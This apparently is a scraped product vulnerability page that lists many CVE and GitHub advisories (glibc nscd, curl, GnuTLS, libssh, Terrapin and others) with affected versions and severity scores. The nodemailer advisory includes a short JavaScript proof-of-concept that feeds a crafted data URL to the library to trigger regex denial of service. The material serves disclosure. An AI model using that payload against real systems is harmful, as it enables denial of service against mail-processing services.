            • 8.14.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-37168@grpc/grps-js implements the core functionality of gRPC purely in JavaScript, without a C++ addon. Prior to versions 1.10.9, 1.9.15, and 1.8.22, there are two separate code paths in which memory can be allocated per message in excess of the `grpc.max_receive_message_length` channel option: If an incoming message has a size on the wire greater than the configured limit, the entire message is buffered before it is discarded; and/or if an incoming message has a size within the limit on the wire but decompresses to a size greater than the limit, the entire message is decompressed into memory, and on the server is not discarded. This has been patched in versions 1.10.9, 1.9.15, and 1.8.22. MEDIUM

            NVD: n/a

            RedHat: 5.3

            • 8.14.1
            • 8.14.0
            • 8.13.4
            • 8.13.3
            • 8.13.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-33599nscd: Stack-based buffer overflow in netgroup cache If the Name Service Cache Daemon's (nscd) fixed size cache is exhausted by client requests then a subsequent client request for netgroup data may result in a stack-based buffer overflow. This flaw was introduced in glibc 2.15 when the cache was added to nscd. This vulnerability is only present in the nscd binary.MEDIUM

            NVD: n/a

            RedHat: 7.6

            • 8.13.4
            • 8.13.3
            • 8.13.2
            • 8.13.1
            • 8.13.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-33600nscd: Null pointer crashes after notfound response If the Name Service Cache Daemon's (nscd) cache fails to add a not-found netgroup response to the cache, the client request can result in a null pointer dereference. This flaw was introduced in glibc 2.15 when the cache was added to nscd. This vulnerability is only present in the nscd binary.MEDIUM

            NVD: n/a

            RedHat: 5.3

            • 8.13.4
            • 8.13.3
            • 8.13.2
            • 8.13.1
            • 8.13.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-33601nscd: netgroup cache may terminate daemon on memory allocation failure The Name Service Cache Daemon's (nscd) netgroup cache uses xmalloc or xrealloc and these functions may terminate the process due to a memory allocation failure resulting in a denial of service to the clients. The flaw was introduced in glibc 2.15 when the cache was added to nscd. This vulnerability is only present in the nscd binary.MEDIUM

            NVD: n/a

            RedHat: 4

            • 8.13.4
            • 8.13.3
            • 8.13.2
            • 8.13.1
            • 8.13.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-33602nscd: netgroup cache assumes NSS callback uses in-buffer strings The Name Service Cache Daemon's (nscd) netgroup cache can corrupt memory when the NSS callback does not store all strings in the provided buffer. The flaw was introduced in glibc 2.15 when the cache was added to nscd. This vulnerability is only present in the nscd binary.MEDIUM

            NVD: n/a

            RedHat: 4

            • 8.13.4
            • 8.13.3
            • 8.13.2
            • 8.13.1
            • 8.13.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-26159Versions of the package follow-redirects before 1.15.4 are vulnerable to Improper Input Validation due to the improper handling of URLs by the url.parse() function. When new URL() throws an error, it can be manipulated to misinterpret the hostname. An attacker could exploit this weakness to redirect traffic to a malicious site, potentially leading to information disclosure, phishing attacks, or other security breaches.MEDIUM

            NVD: 6.1

            RedHat: 6.1

            • 8.13.4
            • 8.13.3
            • 8.13.2
            • 8.13.1
            • 8.13.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-28849follow-redirects is an open source, drop-in replacement for Node's `http` and `https` modules that automatically follows redirects. In affected versions follow-redirects only clears authorization header during cross-domain redirect, but keep the proxy-authentication header which contains credentials too. This vulnerability may lead to credentials leak, but has been addressed in version 1.15.6. Users are advised to upgrade. There are no known workarounds for this vulnerability.MEDIUM

            NVD: n/a

            RedHat: 6.5

            • 8.13.4
            • 8.13.3
            • 8.13.2
            • 8.13.1
            • 8.13.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-28085wall in util-linux through 2.40, often installed with setgid tty permissions, allows escape sequences to be sent to other users' terminals through argv. (Specifically, escape sequences received from stdin are blocked, but escape sequences received from argv are not blocked.) There may be plausible scenarios where this leads to account takeover.MEDIUM

            NVD: n/a

            RedHat: 4.4

            • 8.13.2
            • 8.13.1
            • 8.13.0
            • 8.12.2
            • 8.12.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-2961The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.MEDIUM

            NVD: n/a

            RedHat: 8.8

            • 8.13.2
            • 8.13.1
            • 8.13.0
            • 8.12.2
            • 8.12.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-28834A flaw was found in GnuTLS. The Minerva attack is a cryptographic vulnerability that exploits deterministic behavior in systems like GnuTLS, leading to side-channel leaks. In specific scenarios, such as when using the GNUTLS_PRIVKEY_FLAG_REPRODUCIBLE flag, it can result in a noticeable step in nonce size from 513 to 512 bits, exposing a potential timing side-channel.MEDIUM

            NVD: n/a

            RedHat: 5.3

            • 8.13.2
            • 8.13.1
            • 8.13.0
            • 8.12.2
            • 8.12.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-28182nghttp2 is an implementation of the Hypertext Transfer Protocol version 2 in C. The nghttp2 library prior to version 1.61.0 keeps reading the unbounded number of HTTP/2 CONTINUATION frames even after a stream is reset to keep HPACK context in sync. This causes excessive CPU usage to decode HPACK stream. nghttp2 v1.61.0 mitigates this vulnerability by limiting the number of CONTINUATION frames it accepts per stream. There is no workaround for this vulnerability.MEDIUM

            NVD: n/a

            RedHat: 5.3

            • 8.13.2
            • 8.13.1
            • 8.13.0
            • 8.12.2
            • 8.12.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-4421The NSS code used for checking PKCS#1 v1.5 was leaking information useful in mounting Bleichenbacher-like attacks. Both the overall correctness of the padding as well as the length of the encrypted message was leaking through timing side-channel. By sending large number of attacker-selected ciphertexts, the attacker would be able to decrypt a previously intercepted PKCS#1 v1.5 ciphertext (for example, to decrypt a TLS session that used RSA key exchange), or forge a signature using the victim's key. The issue was fixed by implementing the implicit rejection algorithm, in which the NSS returns a deterministic random message in case invalid padding is detected, as proposed in the Marvin Attack paper. This vulnerability affects NSS < 3.61.MEDIUM

            NVD: 6.5

            RedHat: 6.5

            • 8.13.2
            • 8.13.1
            • 8.13.0
            • 8.12.2
            • 8.12.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-5388NSS was susceptible to a timing side-channel attack when performing RSA decryption. This attack could potentially allow an attacker to recover the private data. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9.MEDIUM

            NVD: n/a

            RedHat: 6.5

            • 8.13.2
            • 8.13.1
            • 8.13.0
            • 8.12.2
            • 8.12.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-6135Multiple NSS NIST curves were susceptible to a side-channel attack known as "Minerva". This attack could potentially allow an attacker to recover the private key. This vulnerability affects Firefox < 121.MEDIUM

            NVD: 4.3

            RedHat: 4.3

            • 8.13.2
            • 8.13.1
            • 8.13.0
            • 8.12.2
            • 8.12.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-28863node-tar is a Tar for Node.js. node-tar prior to version 6.2.1 has no limit on the number of sub-folders created in the folder creation process. An attacker who generates a large number of sub-folders can consume memory on the system running node-tar and even crash the Node.js client within few seconds of running it using a path with too many sub-folders inside. Version 6.2.1 fixes this issue by preventing extraction in excessively deep sub-folders.MEDIUM

            NVD: n/a

            RedHat: 6.5

            • 8.13.1
            • 8.13.0
            • 8.12.2
            • 8.12.1
            • 8.12.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-2398When an application tells libcurl it wants to allow HTTP/2 server push, and the amount of received headers for the push surpasses the maximum allowed limit (1000), libcurl aborts the server push. When aborting, libcurl inadvertently does not free all the previously allocated headers and instead leaks the memory. Further, this error condition fails silently and is therefore not easily detected by an application.MEDIUM

            NVD: n/a

            RedHat: 7.5

            • 8.13.0
            • 8.12.2
            • 8.12.1
            • 8.12.0
            • 8.11.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            GHSA-9h6g-pr28-7cqp### Summary A ReDoS vulnerability occurs when nodemailer tries to parse img files with the parameter `attachDataUrls` set, causing the stuck of event loop. Another flaw was found when nodemailer tries to parse an attachments with a embedded file, causing the stuck of event loop. ### Details Regex: /^data:((?:[^;]*;)*(?:[^,]*)),(.*)$/ Path: compile -> getAttachments -> _processDataUrl Regex: /(<img\b[^>]* src\s*=[\s"']*)(data:([^;]+);[^"'>\s]+)/ Path: _convertDataImages ### PoC https://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6 https://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698 ```js async function exploit() { const MailComposer = require(\"nodemailer/lib/mail-composer\"); const MailComposerObject = new MailComposer(); // Create a malicious data URL that will cause excessive backtracking // This data URL is crafted to have a long sequence of characters that will cause the regex to backtrack const maliciousDataUrl = 'data:image/png;base64,' + 'A;B;C;D;E;F;G;H;I;J;K;L;M;N;O;P;Q;R;S;T;U;V;W;X;Y;Z;'.repeat(1000) + '=='; // Call the vulnerable method with the crafted input const result = await MailComposerObject._processDataUrl({ path: maliciousDataUrl }); } await exploit(); ``` ### Impact ReDoS causes the event loop to stuck a specially crafted evil email can cause this problem.MEDIUM

            NVD: n/a

            RedHat: n/a

            • 8.13.0
            • 8.12.2
            • 8.12.1
            • 8.12.0
            • 8.11.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-0553A vulnerability was found in GnuTLS. The response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from the response times of ciphertexts with correct PKCS#1 v1.5 padding. This issue may allow a remote attacker to perform a timing side-channel attack in the RSA-PSK key exchange, potentially leading to the leakage of sensitive data. CVE-2024-0553 is designated as an incomplete resolution for CVE-2023-5981.MEDIUM

            NVD: 7.5

            RedHat: 7.5

            • 8.12.0
            • 8.11.4
            • 8.11.3
            • 8.11.2
            • 8.11.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-22365linux-pam (aka Linux PAM) before 1.6.0 allows attackers to cause a denial of service (blocked login process) via mkfifo because the openat call (for protect_dir) lacks O_DIRECTORY.MEDIUM

            NVD: 5.5

            RedHat: 5.5

            • 8.12.0
            • 8.11.4
            • 8.11.3
            • 8.11.2
            • 8.11.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-6004A flaw was found in libssh. By utilizing the ProxyCommand or ProxyJump feature, users can exploit unchecked hostname syntax on the client. This issue may allow an attacker to inject malicious code into the command of the features mentioned through the hostname parameter.MEDIUM

            NVD: 4.8

            RedHat: 4.8

            • 8.12.0
            • 8.11.4
            • 8.11.3
            • 8.11.2
            • 8.11.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-6918A flaw was found in the libssh implements abstract layer for message digest (MD) operations implemented by different supported crypto backends. The return values from these were not properly checked, which could cause low-memory situations failures, NULL dereferences, crashes, or usage of the uninitialized memory as an input for the KDF. In this case, non-matching keys will result in decryption/integrity failures, terminating the connection.MEDIUM

            NVD: 5.3

            RedHat: 3.7

            • 8.12.0
            • 8.11.4
            • 8.11.3
            • 8.11.2
            • 8.11.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-45857An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.MEDIUM

            NVD: 6.5

            RedHat: 6.5

            • 8.11.4
            • 8.11.3
            • 8.11.2
            • 8.11.1
            • 8.11.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-7104A vulnerability was found in SQLite SQLite3 up to 3.43.0 and classified as critical. This issue affects the function sessionReadRecord of the file ext/session/sqlite3session.c of the component make alltest Handler. The manipulation leads to heap-based buffer overflow. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248999.MEDIUM

            NVD: 7.3

            RedHat: 7.3

            • 8.11.3
            • 8.11.2
            • 8.11.1
            • 8.11.0
            • 8.10.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.MEDIUM

            NVD: 5.9

            RedHat: 5.9

            • 8.11.3
            • 8.11.2
            • 8.11.1
            • 8.11.0
            • 8.10.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-39804In GNU tar before 1.35, mishandled extension attributes in a PAX archive can lead to an application crash in xheader.c.MEDIUM

            NVD: n/a

            RedHat: 3.3

            • 8.11.3
            • 8.11.2
            • 8.11.1
            • 8.11.0
            • 8.10.4
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-46218This flaw allows a malicious HTTP server to set "super cookies" in curl that are then passed back to more origins than what is otherwise allowed or possible. This allows a site to set cookies that then would get sent to different and unrelated sites and domains. It could do this by exploiting a mixed case flaw in curl's function that verifies a given cookie domain against the Public Suffix List (PSL). For example a cookie could be set with `domain=co.UK` when the URL used a lower case hostname `curl.co.uk`, even though `co.uk` is listed as a PSL domain.MEDIUM

            NVD: 6.5

            RedHat: 5.3

            • 8.11.2
            • 8.11.1
            • 8.11.0
            • 8.10.4
            • 8.10.3
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-5981A vulnerability was found that the response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from response times of ciphertexts with correct PKCS#1 v1.5 padding.MEDIUM

            NVD: 5.9

            RedHat: 5.9

            • 8.11.1
            • 8.11.0
            • 8.10.4
            • 8.10.3
            • 8.10.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-47038A vulnerability was found in perl 5.30.0 through 5.38.0. This issue occurs when a crafted regular expression is compiled by perl, which can allow an attacker controlled byte buffer overflow in a heap allocated buffer.MEDIUM

            NVD: 7.8

            RedHat: 7

            • 8.11.1
            • 8.11.0
            • 8.10.4
            • 8.10.3
            • 8.10.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-36054lib/kadm5/kadm_rpc_xdr.c in MIT Kerberos 5 (aka krb5) before 1.20.2 and 1.21.x before 1.21.1 frees an uninitialized pointer. A remote authenticated user can trigger a kadmind crash. This occurs because _xdr_kadm5_principal_ent_rec does not validate the relationship between n_key_data and the key_data array count.MEDIUM

            NVD: 6.5

            RedHat: 6.5

            • 8.11.0
            • 8.10.4
            • 8.10.3
            • 8.10.2
            • 8.10.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-4316Zod in versions 3.21.0 up to and including 3.22.3 allows an attacker to perform a denial of service while validating emails.MEDIUM

            NVD: 7.5

            RedHat: n/a

            • 8.10.4
            • 8.10.3
            • 8.10.2
            • 8.10.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-41037OpenPGP.js is a JavaScript implementation of the OpenPGP protocol. In affected versions OpenPGP Cleartext Signed Messages are cryptographically signed messages where the signed text is readable without special tools. These messages typically contain a "Hash: ..." header declaring the hash algorithm used to compute the signature digest. OpenPGP.js up to v5.9.0 ignored any data preceding the "Hash: ..." texts when verifying the signature. As a result, malicious parties could add arbitrary text to a third-party Cleartext Signed Message, to lead the victim to believe that the arbitrary text was signed. A user or application is vulnerable to said attack vector if it verifies the CleartextMessage by only checking the returned `verified` property, discarding the associated `data` information, and instead _visually trusting_ the contents of the original message. Since `verificationResult.data` would always contain the actual signed data, users and apps that check this information are not vulnerable. Similarly, given a CleartextMessage object, retrieving the data using `getText()` or the `text` field returns only the contents that are considered when verifying the signature. Finally, re-armoring a CleartextMessage object (using `armor()` will also result in a "sanitised" version, with the extraneous text being removed. This issue has been addressed in version 5.10.1 (current stable version) which will reject messages when calling `openpgp.readCleartextMessage()` and in version 4.10.11 (legacy version) which will will reject messages when calling `openpgp.cleartext.readArmored()`. Users are advised to upgrade. Users unable to upgrade should check the contents of `verificationResult.data` to see what data was actually signed, rather than visually trusting the contents of the armored message.MEDIUM

            NVD: 4.3

            RedHat: n/a

            • 8.10.1
            • 8.9.2
            • 8.9.1
            • 8.9.0
            • 8.8.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-26115All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable.MEDIUM

            NVD: 7.5

            RedHat: 7.5

            • 8.9.0
            • 8.8.2
            • 8.8.1
            • 8.8.0
            • 8.7.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2020-11080In nghttp2 before version 1.41.0, the overly large HTTP/2 SETTINGS frame payload causes denial of service. The proof of concept attack involves a malicious client constructing a SETTINGS frame with a length of 14,400 bytes (2400 individual settings entries) over and over again. The attack causes the CPU to spike at 100%. nghttp2 v1.41.0 fixes this vulnerability. There is a workaround to this vulnerability. Implement nghttp2_on_frame_recv_callback callback, and if received frame is SETTINGS frame and the number of settings entries are large (e.g., > 32), then drop the connection.MEDIUM

            NVD: 7.5

            RedHat: 7.5

            • 8.8.1
            • 8.8.0
            • 8.7.1
            • 8.7.0
            • 8.6.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-1667A NULL pointer dereference was found In libssh during re-keying with algorithm guessing. This issue may allow an authenticated client to cause a denial of service.MEDIUM

            NVD: 6.5

            RedHat: 4.3

            • 8.8.0
            • 8.7.1
            • 8.7.0
            • 8.6.2
            • 8.6.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-2283A vulnerability was found in libssh, where the authentication check of the connecting client can be bypassed in the`pki_verify_data_signature` function in memory allocation problems. This issue may happen if there is insufficient memory or the memory usage is limited. The problem is caused by the return value `rc,` which is initialized to SSH_ERROR and later rewritten to save the return value of the function call `pki_key_check_hash_compatible.` The value of the variable is not changed between this point and the cryptographic verification. Therefore any error between them calls `goto error` returning SSH_OK.MEDIUM

            NVD: 6.5

            RedHat: 4.8

            • 8.8.0
            • 8.7.1
            • 8.7.0
            • 8.6.2
            • 8.6.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-2650Issue summary: Processing some specially crafted ASN.1 object identifiers or data containing them may be very slow. Impact summary: Applications that use OBJ_obj2txt() directly, or use any of the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message size limit may experience notable to very long delays when processing those messages, which may lead to a Denial of Service. An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - most of which have no size limit. OBJ_obj2txt() may be used to translate an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL type ASN1_OBJECT) to its canonical numeric text form, which are the sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by periods. When one of the sub-identifiers in the OBJECT IDENTIFIER is very large (these are sizes that are seen as absurdly large, taking up tens or hundreds of KiBs), the translation to a decimal number in text may take a very long time. The time complexity is O(n^2) with 'n' being the size of the sub-identifiers in bytes (*). With OpenSSL 3.0, support to fetch cryptographic algorithms using names / identifiers in string form was introduced. This includes using OBJECT IDENTIFIERs in canonical numeric text form as identifiers for fetching algorithms. Such OBJECT IDENTIFIERs may be received through the ASN.1 structure AlgorithmIdentifier, which is commonly used in multiple protocols to specify what cryptographic algorithm should be used to sign or verify, encrypt or decrypt, or digest passed data. Applications that call OBJ_obj2txt() directly with untrusted data are affected, with any version of OpenSSL. If the use is for the mere purpose of display, the severity is considered low. In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 certificates, including simple things like verifying its signature. The impact on TLS is relatively low, because all versions of OpenSSL have a 100KiB limit on the peer's certificate chain. Additionally, this only impacts clients, or servers that have explicitly enabled client authentication. In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, such as X.509 certificates. This is assumed to not happen in such a way that it would cause a Denial of Service, so these versions are considered not affected by this issue in such a way that it would be cause for concern, and the severity is therefore considered low.MEDIUM

            NVD: 6.5

            RedHat: 6.5

            • 8.8.0
            • 8.7.1
            • 8.7.0
            • 8.6.2
            • 8.6.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-31484CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.MEDIUM

            NVD: 8.1

            RedHat: 7.4

            • 8.8.0
            • 8.7.1
            • 8.7.0
            • 8.6.2
            • 8.6.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-29491ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.MEDIUM

            NVD: 7.8

            RedHat: 7.8

            • 8.7.1
            • 8.7.0
            • 8.6.2
            • 8.6.1
            • 8.6.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            GHSA-v78c-4p63-2j6c### Impact * if Alice uses `grunt data` (or `grunt release`) to prepare a custom-build, moment-timezone with the latest tzdata from IANA's website * and Mallory intercepts the request to IANA's unencrypted ftp server, Mallory can serve data which might exploit further stages of the moment-timezone tzdata pipeline, or potentially produce a tainted version of moment-timezone (practicality of such attacks is not proved) ### Patches Problem has been patched in version 0.5.35, patch should be applicable with minor modifications to all affected versions. The patch includes changing the FTP endpoint with an HTTPS endpoint. ### Workarounds Specify the exact version of tzdata (like `2014d`, full command being `grunt data:2014d`, then run the rest of the release tasks by hand), or just apply the patch before issuing the grunt command. MEDIUM

            NVD: n/a

            RedHat: n/a

            • 8.7.1
            • 8.7.0
            • 8.6.2
            • 8.6.1
            • 8.6.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-23916An allocation of resources without limits or throttling vulnerability exists in curl <v7.88.0 based on the "chained" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with differentalgorithms. The number of acceptable "links" in this "decompression chain" wascapped, but the cap was implemented on a per-header basis allowing a maliciousserver to insert a virtually unlimited number of compression steps simply byusing many headers. The use of such a decompression chain could result in a "malloc bomb", making curl end up spending enormous amounts of allocated heap memory, or trying to and returning out of memory errors.MEDIUM

            NVD: 6.5

            RedHat: 6.5

            • 8.6.2
            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-27535An authentication bypass vulnerability exists in libcurl <8.0.0 in the FTP connection reuse feature that can result in wrong credentials being used during subsequent transfers. Previously created connections are kept in a connection pool for reuse if they match the current setup. However, certain FTP settings such as CURLOPT_FTP_ACCOUNT, CURLOPT_FTP_ALTERNATIVE_TO_USER, CURLOPT_FTP_SSL_CCC, and CURLOPT_USE_SSL were not included in the configuration match checks, causing them to match too easily. This could lead to libcurl using the wrong credentials when performing a transfer, potentially allowing unauthorized access to sensitive information.MEDIUM

            NVD: 5.9

            RedHat: 5.9

            • 8.6.2
            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-0361A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.MEDIUM

            NVD: 7.4

            RedHat: 7.4

            • 8.6.2
            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2021-36222ec_verify in kdc/kdc_preauth_ec.c in the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) before 1.18.4 and 1.19.x before 1.19.2 allows remote attackers to cause a NULL pointer dereference and daemon crash. This occurs because a return value is not properly managed in a certain situation.MEDIUM

            NVD: 7.5

            RedHat: 7.5

            • 8.6.2
            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2021-37750The Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) before 1.18.5 and 1.19.x before 1.19.3 has a NULL pointer dereference in kdc/do_tgs_req.c via a FAST inner body that lacks a server field.MEDIUM

            NVD: 6.5

            RedHat: 6.5

            • 8.6.2
            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-0767An attacker could construct a PKCS 12 cert bundle in such a way that could allow for arbitrary memory writes via PKCS 12 Safe Bag attributes being mishandled. This vulnerability affects Firefox < 110, Thunderbird < 102.8, and Firefox ESR < 102.8.MEDIUM

            NVD: 8.8

            RedHat: 8.8

            • 8.6.2
            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-3821An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.MEDIUM

            NVD: 5.5

            RedHat: 5.5

            • 8.6.2
            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-4415A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.MEDIUM

            NVD: 5.5

            RedHat: 5.5

            • 8.6.2
            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-48303GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.MEDIUM

            NVD: 5.5

            RedHat: 5.5

            • 8.6.2
            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-25166formula is a math and string formula parser. In versions prior to 3.0.1 crafted user-provided strings to formula's parser might lead to polynomial execution time and a denial of service. Users should upgrade to 3.0.1+. There are no known workarounds for this vulnerability.MEDIUM

            NVD: 6.5

            RedHat: 6.5

            • 8.6.2
            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 9.4.0
            • 9.3.4
